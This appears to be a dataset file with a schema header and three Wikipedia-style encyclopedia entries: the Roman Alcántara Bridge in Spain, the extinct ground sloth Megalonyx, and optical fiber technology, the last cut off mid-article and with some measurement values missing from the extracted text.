id
stringlengths
2
8
url
stringlengths
31
117
title
stringlengths
1
71
text
stringlengths
153
118k
topic
stringclasses
4 values
section
stringlengths
4
49
sublist
stringclasses
9 values
18236523
https://en.wikipedia.org/wiki/Alc%C3%A1ntara%20Bridge
Alcántara Bridge
The Alcántara Bridge (also known as Trajan's Bridge at Alcantara) is a Roman bridge at Alcántara, in Extremadura, Spain. Alcántara is from the Arabic word al-Qantarah (القنطرة) meaning "the arch". The stone arch bridge was built over the Tagus River between 104 and 106 AD by an order of the Roman emperor Trajan in 98. History The Alcántara Bridge has suffered more damage from war than from the elements over the years. The Moors destroyed one of the smallest arches in 1214 although this was rebuilt centuries later, in 1543, with stone taken from the original quarries. The second arch on the northwest side was then later destroyed in 1760 by the Spanish to stop the Portuguese advancing and was repaired in 1762 by Charles III, only to be blown up again in 1809 by Wellington's forces attempting to stop the French. Temporary repairs were made in 1819, but much of the bridge was destroyed yet again in 1836 by the Carlists. The bridge was rebuilt in 1860 using mortared masonry. And following completion of the José María de Oriol Dam, which allowed for the draining of the Tagus riverbed, the main pillars were completely repaired in 1969. The bridge originally measured in length, which today is reduced to . The clear spans of the six arches from the right to the left riverside are , , , , and . Construction The bridge's construction occurred in the ancient Roman province of Lusitania. In Ancient Rome, the costs of building and repairing bridges, known as opus pontis ("bridge work"), were the responsibility of multiple local municipalities. Their shared costs prove Roman bridges belonged to the region overall, and not to any one town (or two, if on a border). The Alcántara Bridge was built at the expense of 12 local municipalities in Lusitania. The names were added on an inscription on the archway over the central pier. Gallery
Technology
Bridges
null
3367910
https://en.wikipedia.org/wiki/Megalonyx
Megalonyx
Megalonyx (Greek, "great-claw") is an extinct genus of ground sloths of the family Megalonychidae, native to North America. It evolved during the Pliocene Epoch and became extinct at the end of the Late Pleistocene, living from ~5 million to ~13,000 years ago. The type species, M. jeffersonii (also called Jefferson's ground sloth), the youngest and largest known species, measured about in length and weighed up to . Megalonyx is suggested to have descended from Pliometanastes, a genus of ground sloth that had arrived in North America during the Late Miocene around 9 million years ago, prior to the main phase of the Great American Interchange. Megalonyx had the widest distribution of any North American ground sloth, having a range encompassing most of the contiguous United States, extending as far north as Alaska during warm interglacial periods. Megalonyx is notable for having been originally described by future U.S. President Thomas Jefferson in 1799 based on remains found in West Virginia; the species M. jeffersonii was described later, named in honor of him. Megalonyx became extinct as part of the end-Pleistocene extinction event, simultaneously with all other mainland ground sloths and most other large mammals native to the Americas. These extinctions followed the arrival of humans in the Americas, and there is evidence that humans interacted with Megalonyx, including butchering its remains shortly prior to its extinction. Taxonomy In 1796, Colonel John Stuart sent Thomas Jefferson, shortly before he took office as Vice President of the United States, some fossil bones: a femur fragment, ulna, radius, and foot bones including three large claws. The discoveries were made in a cave in Greenbrier County, Virginia (presently West Virginia). Jefferson examined the bones and presented his observations in the paper "A Memoir on the Discovery of Certain Bones of a Quadruped of the Clawed Kind in the Western Parts of Virginia" to the American Philosophical Society in Philadelphia on March 10, 1797. The paper was published in 1799, in the same volume as an accompanying paper by his colleague Caspar Wistar, who provided detailed anatomical information about the bones, and illustrated them. Together these two papers are considered the first North American publications devoted to paleontology. In the 1799 paper, Jefferson named the then-unknown animal Megalonyx ("great-claw") and compared each recovered bone to the corresponding bone in a lion. In his original draft of the paper, Jefferson thought the animal was a carnivore, one of the large cats, writing “Let us only say then, what we may safely say, that he was more than three times as large as the lion”. In a postscript, composed after learning of Baron Georges Cuvier's description and illustration of the giant ground sloth Megatherium, discovered in Argentina (mistakenly referred to as Paraguay), Jefferson revised his interpretation and compared Megalonyx to Megatherium. Contrary to Baron Cuvier's view that extinction had played an important role in natural history, an idea that would reach scientific consensus decades later, Jefferson wrote about a "completeness of nature" whose inherent balance did not allow species to go extinct naturally. He asked Lewis and Clark, as they planned their famous expedition in 1804–1806, to keep an eye out for living specimens of Megalonyx, as this would support his case. His idea made no headway and was later shown to be incorrect. However, Jefferson's notion that humans and Megalonyx co-existed in North America has been shown to be correct, as some bones of Megalonyx show marks made by flint tools. His presentation to the American Philosophical Society in 1797 is often credited as the beginning of vertebrate paleontology in North America. In 1799, Caspar Wistar correctly identified the remains as those of a giant ground sloth. In 1822, Desmarest named the species Megatherium jeffersonii in honor of the former statesman and scientist, although he classified it in the genus Megatherium instead. Richard Harlan in 1825 revived the genus Megalonyx with the type species M. jeffersonii, and provided additional taxonomic description. Scientific papers variously give the authority for the genus as Jefferson 1799 (after Jefferson's original naming of the genus), or Harlan 1825. Most authors gave Jefferson as the authority on the genus until a 1942 paper by George Gaylord Simpson, who suggested that the attribution of the authority to Jefferson “is certainly erroneous,”, and suggested that Harlan “may have been the first to use the name in a valid Linnaean form”. A 2024 review paper by Loren E. Babcock found that Simpson's views were mistaken, and clarified that Jefferson was the valid author of the genus, as the description was done in accordance with the rules of taxonomic nomenclature at the time, despite him not assigning a species to it. Recent research confirms that the sloth bones were discovered in Haynes Cave in Monroe County, West Virginia. For many decades in the twentieth century, the reported origin of Jefferson's "Certain Bones" was Organ Cave in what is now Greenbrier County, West Virginia. This story was popularized in the 1920s by a local man, Andrew Price of Marlinton. The story came under scrutiny when in 1993 two fragments of a Megalonyx scapula were found in Haynes Cave in neighboring Monroe County. Smithsonian paleontologist Frederick Grady presented evidence in 1995 confirming Haynes Cave as the original source of Jefferson's fossil. Jefferson reported that the bones had been found by saltpeter workers. He gave the cave owner's name as Frederic Crower. Correspondence between Jefferson and Colonel Stuart, who sent him the bones, indicates that the cave was located about five miles from Stuart's home and that it contained saltpeter vats. An investigation of property ownership records revealed "Frederic Crower" to be an apparent misspelling of the name Frederic Gromer. Organ Cave was never owned by Gromer, but Haynes Cave was. Two letters written by Tristram Patton, the subsequent owner of Haynes Cave, indicate that this cave was located in Monroe County near Second Creek. Monroe County had originally been part of Greenbrier County; it became a separate county shortly after the discovery of the bones. In his own letters Patton described the cave and indicated that more fossil bones remained inside. M. jeffersonii is still the most commonly identified species of Megalonyx. It was designated the state fossil of West Virginia in 2008. M. leptostomus, named by Cope (1893), lived from the Blancan to the Irvingtonian. This species lived from Florida to Texas, north to Kansas and Nebraska, and west to New Mexico, Nevada, Oregon, and Washington. It is about half the size of M. jeffersonii. It evolved into M. wheatleyi, the direct ancestor of M. jeffersonii. Species gradually got larger, with different species mostly based on size and geologic age. Evolution The first wave of Megalonychids came to North America by island-hopping across the Central American Seaway from South America, where ground sloths arose, prior to formation of the Panamanian land bridge. Based on molecular results, its closest living relatives are the three-toed sloths (Bradypus); earlier morphological investigations came to a different conclusion. Megalonyx is thought to be descended from Pliometanastes, a ground sloth that arrived in North America during the late Miocene, around 9 million years ago. The earliest representatives of Megalonyx appeared during the Pliocene. M. jeffersonii lived from the late Middle Pleistocene/ late Irvingtonian (250–300,000 years ago) through to the Rancholabrean of the Late Pleistocene (11,000 BP). M. jeffersonii was probably descended from M. wheatleyi. The Megalonyx lineage increased in size with time, with the last species M. jeffersonii being the largest. Description Megalonyx jeffersonii was a large, heavily built herbivore about long. It was comparable in size to a cow, with some specimens estimated to exceed in mass. The hind limbs were plantigrade (flat-footed) and this, along with its stout tail, allowed it to rear up into a semi-erect position to feed. The hands had three large claws, which were likely used for grasping and defense. The teeth of Megalonyx jeffersonii were hypselodont (high crowned). Paleobiology During excavations at Tarkio Valley in southwest Iowa, an adult (presumably female) Megalonyx jeffersonii was found in direct association with two juveniles of different ages, the oldest suggested to be around 3-4 years old, suggesting that adults cared for young of different generations. A 2022 study estimated, based on the ages of the adult and the two juveniles, that the average lifespan was approximately 19 years, sexual maturity occurred at about 6 and a half years, that gestation time was around 14 months, and the interval between births was approximately 3 years. Megalonyx is thought to have been a browser. Habitat Megalonyx jeffersonii ranged over much of North America, with its range spanning nearly the whole contiguous United States and parts of southern Canada, with some remains known as far south as central Mexico. Their remains have been found as far north as Alaska and the Yukon during interglacial intervals. The sloth ranged as far northeast as New York. In 2010, a specimen was discovered at the Ziegler Reservoir site near Snowmass Village, Colorado, in the Rocky Mountains at an elevation of . The habitat of Megalonyx jeffersonii was highly variable, but often associated with spruce-dominated, mixed conifer-hardwood forest. Extinction Megalonyx jeffersonii became extinct at the end of the Pleistocene, as part of the Quaternary extinction event, in which all other mainland ground sloths and most other large mammals of the Americas became extinct. The youngest confirmed radiocarbon date is in Ohio, dating to 13,180–13,034 calibrated years Before Present. This timing was co-incident with both the Younger Dryas and a major growth in population of recently arrived Paleoindians. In Ohio, a specimen of Megalonyx jeffersonii, dubbed the "Firelands Ground Sloth", dating to around 13,738 to 13,435 calibrated years Before Present (~11,788 to 11,485 BCE) was found with cut marks indicative of butchery, suggesting that hunting may have played a role in its extinction.
Biology and health sciences
Xenarthra
Animals
3372377
https://en.wikipedia.org/wiki/Optical%20fiber
Optical fiber
An optical fiber, or optical fibre, is a flexible glass or plastic fiber that can transmit light from one end to the other. Such fibers find wide usage in fiber-optic communications, where they permit transmission over longer distances and at higher bandwidths (data transfer rates) than electrical cables. Fibers are used instead of metal wires because signals travel along them with less loss and are immune to electromagnetic interference. Fibers are also used for illumination and imaging, and are often wrapped in bundles so they may be used to carry light into, or images out of confined spaces, as in the case of a fiberscope. Specially designed fibers are also used for a variety of other applications, such as fiber optic sensors and fiber lasers. Glass optical fibers are typically made by drawing, while plastic fibers can be made either by drawing or by extrusion. Optical fibers typically include a core surrounded by a transparent cladding material with a lower index of refraction. Light is kept in the core by the phenomenon of total internal reflection which causes the fiber to act as a waveguide. Fibers that support many propagation paths or transverse modes are called multi-mode fibers, while those that support a single mode are called single-mode fibers (SMF). Multi-mode fibers generally have a wider core diameter and are used for short-distance communication links and for applications where high power must be transmitted. Single-mode fibers are used for most communication links longer than . Being able to join optical fibers with low loss is important in fiber optic communication. This is more complex than joining electrical wire or cable and involves careful cleaving of the fibers, precise alignment of the fiber cores, and the coupling of these aligned cores. For applications that demand a permanent connection a fusion splice is common. In this technique, an electric arc is used to melt the ends of the fibers together. Another common technique is a mechanical splice, where the ends of the fibers are held in contact by mechanical force. Temporary or semi-permanent connections are made by means of specialized optical fiber connectors. The field of applied science and engineering concerned with the design and application of optical fibers is known as fiber optics. The term was coined by Indian-American physicist Narinder Singh Kapany. History Daniel Colladon and Jacques Babinet first demonstrated the guiding of light by refraction, the principle that makes fiber optics possible, in Paris in the early 1840s. John Tyndall included a demonstration of it in his public lectures in London, 12 years later. Tyndall also wrote about the property of total internal reflection in an introductory book about the nature of light in 1870: In the late 19th century, a team of Viennese doctors guided light through bent glass rods to illuminate body cavities. Practical applications such as close internal illumination during dentistry followed, early in the twentieth century. Image transmission through tubes was demonstrated independently by the radio experimenter Clarence Hansell and the television pioneer John Logie Baird in the 1920s. In the 1930s, Heinrich Lamm showed that one could transmit images through a bundle of unclad optical fibers and used it for internal medical examinations, but his work was largely forgotten. In 1953, Dutch scientist Bram van Heel first demonstrated image transmission through bundles of optical fibers with a transparent cladding. Later that same year, Harold Hopkins and Narinder Singh Kapany at Imperial College in London succeeded in making image-transmitting bundles with over 10,000 fibers, and subsequently achieved image transmission through a 75 cm long bundle which combined several thousand fibers. The first practical fiber optic semi-flexible gastroscope was patented by Basil Hirschowitz, C. Wilbur Peters, and Lawrence E. Curtiss, researchers at the University of Michigan, in 1956. In the process of developing the gastroscope, Curtiss produced the first glass-clad fibers; previous optical fibers had relied on air or impractical oils and waxes as the low-index cladding material. Kapany coined the term fiber optics after writing a 1960 article in Scientific American that introduced the topic to a wide audience. He subsequently wrote the first book about the new field. The first working fiber-optic data transmission system was demonstrated by German physicist Manfred Börner at Telefunken Research Labs in Ulm in 1965, followed by the first patent application for this technology in 1966. In 1968, NASA used fiber optics in the television cameras that were sent to the moon. At the time, the use in the cameras was classified confidential, and employees handling the cameras had to be supervised by someone with an appropriate security clearance. Charles K. Kao and George A. Hockham of the British company Standard Telephones and Cables (STC) were the first to promote the idea that the attenuation in optical fibers could be reduced below 20 decibels per kilometer (dB/km), making fibers a practical communication medium, in 1965. They proposed that the attenuation in fibers available at the time was caused by impurities that could be removed, rather than by fundamental physical effects such as scattering. They correctly and systematically theorized the light-loss properties for optical fiber and pointed out the right material to use for such fibers—silica glass with high purity. This discovery earned Kao the Nobel Prize in Physics in 2009. The crucial attenuation limit of 20 dB/km was first achieved in 1970 by researchers Robert D. Maurer, Donald Keck, Peter C. Schultz, and Frank Zimar working for American glass maker Corning Glass Works. They demonstrated a fiber with 17 dB/km attenuation by doping silica glass with titanium. A few years later they produced a fiber with only 4 dB/km attenuation using germanium dioxide as the core dopant. In 1981, General Electric produced fused quartz ingots that could be drawn into strands long. Initially, high-quality optical fibers could only be manufactured at 2 meters per second. Chemical engineer Thomas Mensah joined Corning in 1983 and increased the speed of manufacture to over 50 meters per second, making optical fiber cables cheaper than traditional copper ones. These innovations ushered in the era of optical fiber telecommunication. The Italian research center CSELT worked with Corning to develop practical optical fiber cables, resulting in the first metropolitan fiber optic cable being deployed in Turin in 1977. CSELT also developed an early technique for splicing optical fibers, called Springroove. Attenuation in modern optical cables is far less than in electrical copper cables, leading to long-haul fiber connections with repeater distances of . Two teams, led by David N. Payne of the University of Southampton and Emmanuel Desurvire at Bell Labs, developed the erbium-doped fiber amplifier, which reduced the cost of long-distance fiber systems by reducing or eliminating optical-electrical-optical repeaters, in 1986 and 1987 respectively. The emerging field of photonic crystals led to the development in 1991 of photonic-crystal fiber, which guides light by diffraction from a periodic structure, rather than by total internal reflection. The first photonic crystal fibers became commercially available in 2000. Photonic crystal fibers can carry higher power than conventional fibers and their wavelength-dependent properties can be manipulated to improve performance. These fibers can have hollow cores. Uses Communication Optical fiber is used as a medium for telecommunication and computer networking because it is flexible and can be bundled as cables. It is especially advantageous for long-distance communications, because infrared light propagates through the fiber with much lower attenuation compared to electricity in electrical cables. This allows long distances to be spanned with few repeaters. 10 or 40 Gbit/s is typical in deployed systems. Through the use of wavelength-division multiplexing (WDM), each fiber can carry many independent channels, each using a different wavelength of light. The net data rate (data rate without overhead bytes) per fiber is the per-channel data rate reduced by the forward error correction (FEC) overhead, multiplied by the number of channels (usually up to 80 in commercial dense WDM systems ). For short-distance applications, such as a network in an office building (see fiber to the office), fiber-optic cabling can save space in cable ducts. This is because a single fiber can carry much more data than electrical cables such as standard category 5 cable, which typically runs at 100 Mbit/s or 1 Gbit/s speeds. Fibers are often also used for short-distance connections between devices. For example, most high-definition televisions offer a digital audio optical connection. This allows the streaming of audio over light, using the S/PDIF protocol over an optical TOSLINK connection. Sensors Fibers have many uses in remote sensing. In some applications, the fiber itself is the sensor (the fibers channel optical light to a processing device that analyzes changes in the light's characteristics). In other cases, fiber is used to connect a sensor to a measurement system. Optical fibers can be used as sensors to measure strain, temperature, pressure, and other quantities by modifying a fiber so that the property being measured modulates the intensity, phase, polarization, wavelength, or transit time of light in the fiber. Sensors that vary the intensity of light are the simplest since only a simple source and detector are required. A particularly useful feature of such fiber optic sensors is that they can, if required, provide distributed sensing over distances of up to one meter. Distributed acoustic sensing is one example of this. In contrast, highly localized measurements can be provided by integrating miniaturized sensing elements with the tip of the fiber. These can be implemented by various micro- and nanofabrication technologies, such that they do not exceed the microscopic boundary of the fiber tip, allowing for such applications as insertion into blood vessels via hypodermic needle. Extrinsic fiber optic sensors use an optical fiber cable, normally a multi-mode one, to transmit modulated light from either a non-fiber optical sensor—or an electronic sensor connected to an optical transmitter. A major benefit of extrinsic sensors is their ability to reach otherwise inaccessible places. An example is the measurement of temperature inside jet engines by using a fiber to transmit radiation into a pyrometer outside the engine. Extrinsic sensors can be used in the same way to measure the internal temperature of electrical transformers, where the extreme electromagnetic fields present make other measurement techniques impossible. Extrinsic sensors measure vibration, rotation, displacement, velocity, acceleration, torque, and torsion. A solid-state version of the gyroscope, using the interference of light, has been developed. The fiber optic gyroscope (FOG) has no moving parts and exploits the Sagnac effect to detect mechanical rotation. Common uses for fiber optic sensors include advanced intrusion detection security systems. The light is transmitted along a fiber optic sensor cable placed on a fence, pipeline, or communication cabling, and the returned signal is monitored and analyzed for disturbances. This return signal is digitally processed to detect disturbances and trip an alarm if an intrusion has occurred. Optical fibers are widely used as components of optical chemical sensors and optical biosensors. Power transmission Optical fiber can be used to transmit power using a photovoltaic cell to convert the light into electricity. While this method of power transmission is not as efficient as conventional ones, it is especially useful in situations where it is desirable not to have a metallic conductor as in the case of use near MRI machines, which produce strong magnetic fields. Other examples are for powering electronics in high-powered antenna elements and measurement devices used in high-voltage transmission equipment. Other uses Optical fibers are used as light guides in medical and other applications where bright light needs to be shone on a target without a clear line-of-sight path. Many microscopes use fiber-optic light sources to provide intense illumination of samples being studied. Optical fiber is also used in imaging optics. A coherent bundle of fibers is used, sometimes along with lenses, for a long, thin imaging device called an endoscope, which is used to view objects through a small hole. Medical endoscopes are used for minimally invasive exploratory or surgical procedures. Industrial endoscopes (see fiberscope or borescope) are used for inspecting anything hard to reach, such as jet engine interiors. In some buildings, optical fibers route sunlight from the roof to other parts of the building (see nonimaging optics). Optical-fiber lamps are used for illumination in decorative applications, including signs, art, toys and artificial Christmas trees. Optical fiber is an intrinsic part of the light-transmitting concrete building product LiTraCon. Optical fiber can also be used in structural health monitoring. This type of sensor can detect stresses that may have a lasting impact on structures. It is based on the principle of measuring analog attenuation. In spectroscopy, optical fiber bundles transmit light from a spectrometer to a substance that cannot be placed inside the spectrometer itself, in order to analyze its composition. A spectrometer analyzes substances by bouncing light off and through them. By using fibers, a spectrometer can be used to study objects remotely. An optical fiber doped with certain rare-earth elements such as erbium can be used as the gain medium of a fiber laser or optical amplifier. Rare-earth-doped optical fibers can be used to provide signal amplification by splicing a short section of doped fiber into a regular (undoped) optical fiber line. The doped fiber is optically pumped with a second laser wavelength that is coupled into the line in addition to the signal wave. Both wavelengths of light are transmitted through the doped fiber, which transfers energy from the second pump wavelength to the signal wave. The process that causes the amplification is stimulated emission. Optical fiber is also widely exploited as a nonlinear medium. The glass medium supports a host of nonlinear optical interactions, and the long interaction lengths possible in fiber facilitate a variety of phenomena, which are harnessed for applications and fundamental investigation. Conversely, fiber nonlinearity can have deleterious effects on optical signals, and measures are often required to minimize such unwanted effects. Optical fibers doped with a wavelength shifter collect scintillation light in physics experiments. Fiber-optic sights for handguns, rifles, and shotguns use pieces of optical fiber to improve the visibility of markings on the sight. Principle of operation An optical fiber is a cylindrical dielectric waveguide (nonconducting waveguide) that transmits light along its axis through the process of total internal reflection. The fiber consists of a core surrounded by a cladding layer, both of which are made of dielectric materials. To confine the optical signal in the core, the refractive index of the core must be greater than that of the cladding. The boundary between the core and cladding may either be abrupt, in step-index fiber, or gradual, in graded-index fiber. Light can be fed into optical fibers using lasers or LEDs. Fiber is immune to electrical interference as there is no cross-talk between signals in different cables and no pickup of environmental noise. Information traveling inside the optical fiber is even immune to electromagnetic pulses generated by nuclear devices. Fiber cables do not conduct electricity, which makes fiber useful for protecting communications equipment in high voltage environments such as power generation facilities or applications prone to lightning strikes. The electrical isolation also prevents problems with ground loops. Because there is no electricity in optical cables that could potentially generate sparks, they can be used in environments where explosive fumes are present. Wiretapping (in this case, fiber tapping) is more difficult compared to electrical connections. Fiber cables are not targeted for metal theft. In contrast, copper cable systems use large amounts of copper and have been targeted since the 2000s commodities boom. Refractive index The refractive index is a way of measuring the speed of light in a material. Light travels fastest in a vacuum, such as in outer space. The speed of light in vacuum is about 300,000 kilometers (186,000 miles) per second. The refractive index of a medium is calculated by dividing the speed of light in vacuum by the speed of light in that medium. The refractive index of vacuum is therefore 1, by definition. A typical single-mode fiber used for telecommunications has a cladding made of pure silica, with an index of 1.444 at 1500 nm, and a core of doped silica with an index around 1.4475. The larger the index of refraction, the slower light travels in that medium. From this information, a simple rule of thumb is that a signal using optical fiber for communication will travel at around 200,000 kilometers per second. Thus a phone call carried by fiber between Sydney and New York, a 16,000-kilometer distance, means that there is a minimum delay of 80 milliseconds (about of a second) between when one caller speaks and the other hears. Total internal reflection When light traveling in an optically dense medium hits a boundary at a steep angle of incidence (larger than the critical angle for the boundary), the light is completely reflected. This is called total internal reflection. This effect is used in optical fibers to confine light in the core. Most modern optical fiber is weakly guiding, meaning that the difference in refractive index between the core and the cladding is very small (typically less than 1%). Light travels through the fiber core, bouncing back and forth off the boundary between the core and cladding. Because the light must strike the boundary with an angle greater than the critical angle, only light that enters the fiber within a certain range of angles can travel down the fiber without leaking out. This range of angles is called the acceptance cone of the fiber. There is a maximum angle from the fiber axis at which light may enter the fiber so that it will propagate, or travel, in the core of the fiber. The sine of this maximum angle is the numerical aperture (NA) of the fiber. Fiber with a larger NA requires less precision to splice and work with than fiber with a smaller NA. The size of this acceptance cone is a function of the refractive index difference between the fiber's core and cladding. Single-mode fiber has a small NA. Multi-mode fiber Fiber with large core diameter (greater than 10 micrometers) may be analyzed by geometrical optics. Such fiber is called multi-mode fiber, from the electromagnetic analysis (see below). In a step-index multi-mode fiber, rays of light are guided along the fiber core by total internal reflection. Rays that meet the core-cladding boundary at an angle (measured relative to a line normal to the boundary) greater than the critical angle for this boundary, are completely reflected. The critical angle is determined by the difference in the index of refraction between the core and cladding materials. Rays that meet the boundary at a low angle are refracted from the core into the cladding where they terminate. The critical angle determines the acceptance angle of the fiber, often reported as a numerical aperture. A high numerical aperture allows light to propagate down the fiber in rays both close to the axis and at various angles, allowing efficient coupling of light into the fiber. However, this high numerical aperture increases the amount of dispersion as rays at different angles have different path lengths and therefore take different amounts of time to traverse the fiber. In graded-index fiber, the index of refraction in the core decreases continuously between the axis and the cladding. This causes light rays to bend smoothly as they approach the cladding, rather than reflecting abruptly from the core-cladding boundary. The resulting curved paths reduce multi-path dispersion because high-angle rays pass more through the lower-index periphery of the core, rather than the high-index center. The index profile is chosen to minimize the difference in axial propagation speeds of the various rays in the fiber. This ideal index profile is very close to a parabolic relationship between the index and the distance from the axis. Single-mode fiber Fiber with a core diameter less than about ten times the wavelength of the propagating light cannot be modeled using geometric optics. Instead, it must be analyzed as an electromagnetic waveguide structure, according to Maxwell's equations as reduced to the electromagnetic wave equation. As an optical waveguide, the fiber supports one or more confined transverse modes by which light can propagate along the fiber. Fiber supporting only one mode is called single-mode. The waveguide analysis shows that the light energy in the fiber is not completely confined in the core. Instead, especially in single-mode fibers, a significant fraction of the energy in the bound mode travels in the cladding as an evanescent wave. The most common type of single-mode fiber has a core diameter of 8–10 micrometers and is designed for use in the near infrared. Multi-mode fiber, by comparison, is manufactured with core diameters as small as 50 micrometers and as large as hundreds of micrometers. Special-purpose fiber Some special-purpose optical fiber is constructed with a non-cylindrical core or cladding layer, usually with an elliptical or rectangular cross-section. These include polarization-maintaining fiber used in fiber optic sensors and fiber designed to suppress whispering gallery mode propagation. Photonic-crystal fiber is made with a regular pattern of index variation (often in the form of cylindrical holes that run along the length of the fiber). Such fiber uses diffraction effects instead of or in addition to total internal reflection, to confine light to the fiber's core. The properties of the fiber can be tailored to a wide variety of applications. Mechanisms of attenuation Attenuation in fiber optics, also known as transmission loss, is the reduction in the intensity of the light signal as it travels through the transmission medium. Attenuation coefficients in fiber optics are usually expressed in units of dB/km. The medium is usually a fiber of silica glass that confines the incident light beam within. Attenuation is an important factor limiting the transmission of a digital signal across large distances. Thus, much research has gone into both limiting the attenuation and maximizing the amplification of the optical signal. The four orders of magnitude reduction in the attenuation of silica optical fibers over four decades was the result of constant improvement of manufacturing processes, raw material purity, preform, and fiber designs, which allowed for these fibers to approach the theoretical lower limit of attenuation. Single-mode optical fibers can be made with extremely low loss. Corning's Vascade® EX2500 fiber, a low loss single-mode fiber for telecommunications wavelengths, has a nominal attenuation of 0.148 dB/km at 1550 nm. A 10 km length of such fiber transmits nearly 71% of optical energy at 1550 nm. Attenuation in optical fiber is caused primarily by both scattering and absorption. In fibers based on fluoride glasses such as ZBLAN, minimum attenuation is limited by impurity absorption. Vast majority of optical fibers are based on silica glass, where impurity absorption is negligible. In silica fibers attenuation is determined by intrinsic mechanisms: Rayleigh scattering in the glasses through which the light is propagating, and infrared absorption in the same glasses. Absorption in silica increases steeply at wavelengths above 1570 nm. At wavelengths most useful for telecommunications, Rayleigh scattering is the dominant loss mechanism. At 1550 nm attenuation components for a record low loss fiber are given as follows: Rayleigh scattering loss: 0.1200 dB/km, infrared absorption loss: 0.0150 dB/km, impurity absorption loss: 0.0047 dB/km, waveguide imperfection loss: 0.0010 dB/km. Light scattering The propagation of light through the core of an optical fiber is based on the total internal reflection of the lightwave, in terms of geometric optics, or guided modes, in terms of electromagnetic waveguide. In a typical single mode optical fiber about 75% of light is propagating through the core material, having higher refractive index, and about 25% of light is propagating through the cladding, having lower refractive index. The interface between the core and cladding glasses is exceptionally smooth and does not give rise to a significant scattering loss or a waveguide imperfection loss. The scattering loss originates primarily from the Rayleigh scattering in the bulk of the glasses composing the fiber core and cladding. The scattering of light in optical quality glass fiber is caused by molecular level irregularities (compositional fluctuations) in the glass structure. Indeed, one emerging school of thought is that glass is simply the limiting case of a polycrystalline solid. Within this framework, domains exhibiting various degrees of short-range order become the building blocks of metals as well as glasses and ceramics. Distributed both between and within these domains are micro-structural defects that provide the most ideal locations for light scattering. Scattering depends on the wavelength of the light being scattered and on the size of the scattering centers. Angular dependence of the light intensity scattered from an optical fiber matched that of Rayleigh scattering, indicating that the scattering centers are much smaller than the wavelength of propagating light. It originates from the density fluctuations driven by fictive temperature of the glass, and from the concentration fluctuations of dopants in both the core and the cladding. Rayleigh scattering coefficient, R, can be presented as : where represents Rayleigh scattering on density fluctuations and represents Rayleigh scattering on dopant concentration fluctuations. Dopants, such as germanium dioxide or fluorine, are used to create the refractive index difference between the core and the cladding, to form a waveguide structure. where is wavelength, is refractive index, is photo-elastic coefficient, is isothermal compressibility, is the Boltzmann constant, is fictive temperature. The only physically significant variable affecting scattering on density fluctuations is the fictive temperature of the glass, lower fictive temperature results in a more homogeneous glass and lower Rayleigh scattering. Fictive temperature may be dramatically reduced by about 100 wt. ppm of alkali oxide dopant in the fiber core, as well as slower cooling of the fiber during the fiber draw process. These approaches are used to produce optical fibers with the lowest attenuation, especially those for submarine telecom cables. For small dopant concentrations, is proportional to , where is the mole fraction of the dopant in SiO2-based glass and is the refractive index of the glass. When GeO2 dopant is used to increase the refractive index of the fiber core, it increases the concentration fluctuation component of Rayleigh scattering, and attenuation of the fiber. This is why the lowest attenuation fibers do not use GeO2 in the core, and use fluorine in the cladding, to reduce the refractive index of the cladding. in pure silica core fiber is proportional to the overlap integral between LP01 mode and fluorine-induced concentration fluctuation component in the cladding. In the core of potassium-doped pure silica-core (KPSC) fiber only density fluctuations play a significant role, as the concentrations of K2O, fluorine and chlorine are very low. The density fluctuations in the core are moderated by lower fictive temperature resulting from potassium doping, and are further reduced by annealing during the fiber draw process. This differs from the cladding, where higher fluorine dopant levels and the resulting concentration fluctuations add to the loss. In such fibers the light travelling through the core experiences lower scattering and lower attenuation compared to the light propagating through the cladding segment of the fiber. At high optical powers, scattering can also be caused by nonlinear optical processes in the fiber. UV-Vis-IR absorption In addition to light scattering, attenuation or signal loss can also occur due to selective absorption of specific wavelengths. Primary material considerations include both electrons and molecules as follows: At the electronic level, it depends on whether the electron orbitals are spaced (or "quantized") such that they can absorb a quantum of light (or photon) of a specific wavelength or frequency in the ultraviolet (UV) or visible ranges. This is what gives rise to color. At the atomic or molecular level, it depends on the frequencies of atomic or molecular vibrations or chemical bonds, how closely packed its atoms or molecules are, and whether or not the atoms or molecules exhibit long-range order. These factors will determine the capacity of the material to transmit longer wavelengths in the infrared (IR), far IR, radio, and microwave ranges. The design of any optically transparent device requires the selection of materials based upon knowledge of its properties and limitations. The crystal structure absorption characteristics observed at the lower frequency regions (mid- to far-IR wavelength range) define the long-wavelength transparency limit of the material. They are the result of the interactive coupling between the motions of thermally induced vibrations of the constituent atoms and molecules of the solid lattice and the incident light wave radiation. Hence, all materials are bounded by limiting regions of absorption caused by atomic and molecular vibrations (bond-stretching) in the far-infrared (>10 μm). In other words, the selective absorption of IR light by a particular material occurs because the selected frequency of the light wave matches the frequency (or an integer multiple of the frequency, i.e. harmonic) at which the particles of that material vibrate. Since different atoms and molecules have different natural frequencies of vibration, they will selectively absorb different frequencies (or portions of the spectrum) of IR light. Reflection and transmission of light waves occur because the frequencies of the light waves do not match the natural resonant frequencies of vibration of the objects. When IR light of these frequencies strikes an object, the energy is either reflected or transmitted. Loss budget Attenuation over a cable run is significantly increased by the inclusion of connectors and splices. When computing the acceptable attenuation (loss budget) between a transmitter and a receiver one includes: dB loss due to the type and length of fiber optic cable, dB loss introduced by connectors, and dB loss introduced by splices. Connectors typically introduce 0.3 dB per connector on well-polished connectors. Splices typically introduce less than 0.2 dB per splice. The total loss can be calculated by: Loss = dB loss per connector × number of connectors + dB loss per splice × number of splices + dB loss per kilometer × kilometers of fiber, where the dB loss per kilometer is a function of the type of fiber and can be found in the manufacturer's specifications. For example, a typical 1550 nm single-mode fiber has a loss of 0.3 dB per kilometer. The calculated loss budget is used when testing to confirm that the measured loss is within the normal operating parameters. Manufacturing Materials Glass optical fibers are almost always made from silica, but some other materials, such as fluorozirconate, fluoroaluminate, and chalcogenide glasses as well as crystalline materials like sapphire, are used for longer-wavelength infrared or other specialized applications. Silica and fluoride glasses usually have refractive indices of about 1.5, but some materials such as the chalcogenides can have indices as high as 3. Typically the index difference between core and cladding is less than one percent. Plastic optical fibers (POF) are commonly step-index multi-mode fibers with a core diameter of 0.5 millimeters or larger. POF typically have higher attenuation coefficients than glass fibers, 1 dB/m or higher, and this high attenuation limits the range of POF-based systems. Silica Silica exhibits fairly good optical transmission over a wide range of wavelengths. In the near-infrared (near IR) portion of the spectrum, particularly around 1.5 μm, silica can have extremely low absorption and scattering losses of the order of 0.2 dB/km. Such low losses depend on using ultra-pure silica. A high transparency in the 1.4-μm region is achieved by maintaining a low concentration of hydroxyl groups (OH). Alternatively, a high OH concentration is better for transmission in the ultraviolet (UV) region. Silica can be 